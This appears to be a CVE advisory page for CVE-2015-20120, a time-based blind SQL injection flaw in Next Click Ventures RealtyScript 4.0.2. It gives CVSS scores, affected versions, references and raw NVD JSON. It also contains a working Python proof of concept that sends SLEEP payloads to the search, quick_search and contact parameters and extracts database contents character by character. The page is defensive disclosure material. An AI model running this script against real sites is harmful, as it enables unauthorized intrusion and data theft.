CVE-2015-20120

Description

Next Click Ventures RealtyScript 4.0.2 contains multiple time-based blind SQL injection vulnerabilities that allow unauthenticated attackers to extract database information by injecting SQL code into application parameters. Attackers can craft requests with time-delay payloads to infer database contents character by character based on response timing differences.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nextclickventures:realtyscript:4.0.2:*:*:*:*:*:*:* - VULNERABLE

RealtyScript < 4.0.2

Next Click Ventures RealtyScript 4.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# CVE-2015-20120 Time-based Blind SQL Injection PoC
# Target: Next Click Ventures RealtyScript 4.0.2
# Vulnerable Parameters: search, quick_search, contact

TARGET_URL = "http://target.com/search"

def test_vulnerability(param_name, param_value):
    """Test if parameter is vulnerable to time-based blind SQLi"""
    # Normal request for baseline timing
    start = time.time()
    normal_response = requests.get(TARGET_URL, params={param_name: param_value})
    normal_time = time.time() - start
    
    # Time-based payload with 5 second delay
    sql_payload = f"{param_value}' AND SLEEP(5)---"
    start = time.time()
    vuln_response = requests.get(TARGET_URL, params={param_name: sql_payload})
    vuln_time = time.time() - start
    
    if vuln_time > 4:  # If response took >4 seconds, likely vulnerable
        print(f"[+] VULNERABLE: {param_name} parameter")
        print(f"    Normal time: {normal_time:.2f}s")
        print(f"    With SLEEP(5): {vuln_time:.2f}s")
        return True
    return False

def extract_data_via_blind_sqli(param_name, query):
    """Extract data using time-based blind SQL injection"""
    extracted = ""
    for pos in range(1, 50):  # Max 50 characters
        for ascii_val in range(32, 127):
            payload = f"test' AND (SELECT CASE WHEN (ASCII(SUBSTRING(({query}),{pos},1))={ascii_val}) THEN SLEEP(2) ELSE 0 END))---"
            start = time.time()
            requests.get(TARGET_URL, params={param_name: payload})
            elapsed = time.time() - start
            
            if elapsed > 1.5:
                extracted += chr(ascii_val)
                print(f"[*] Extracted so far: {extracted}")
                break
    return extracted

# Example usage
if __name__ == "__main__":
    print("[*] Testing CVE-2015-20120 - RealtyScript Blind SQLi")
    test_vulnerability("search", "test")
    test_vulnerability("quick_search", "test")
    test_vulnerability("contact", "test")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2015-20120
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2015-20120
[3] CVE Details https://www.cvedetails.com/cve/CVE-2015-20120/
[4] VulDB https://vuldb.com/cve/CVE-2015-20120
[5] https://www.exploit-db.com/exploits/38497
[6] https://www.vulncheck.com/advisories/realtyscript-multiple-time-based-blind-sql-injection
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2015-20120", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:47.957", "lastModified": "2026-03-19T14:15:53.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next Click Ventures RealtyScript 4.0.2 contains multiple time-based blind SQL injection vulnerabilities that allow unauthenticated attackers to extract database information by injecting SQL code into application parameters. Attackers can craft requests with time-delay payloads to infer database contents character by character based on response timing differences."}, {"lang": "es", "value": "Next Click Ventures RealtyScript 4.0.2 contiene múltiples vulnerabilidades de inyección SQL ciega basada en tiempo que permiten a atacantes no autenticados extraer información de la base de datos inyectando código SQL en los parámetros de la aplicación. Los atacantes pueden elaborar solicitudes con cargas útiles de retardo de tiempo para inferir el contenido de la base de datos carácter por carácter basándose en las diferencias de tiempo de respuesta."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextclickventures:realtyscript:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "237FBCF4-383B-4460-82EF-FC61A749D53B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/38497", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realtyscript-multiple-time-based-blind-sql-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}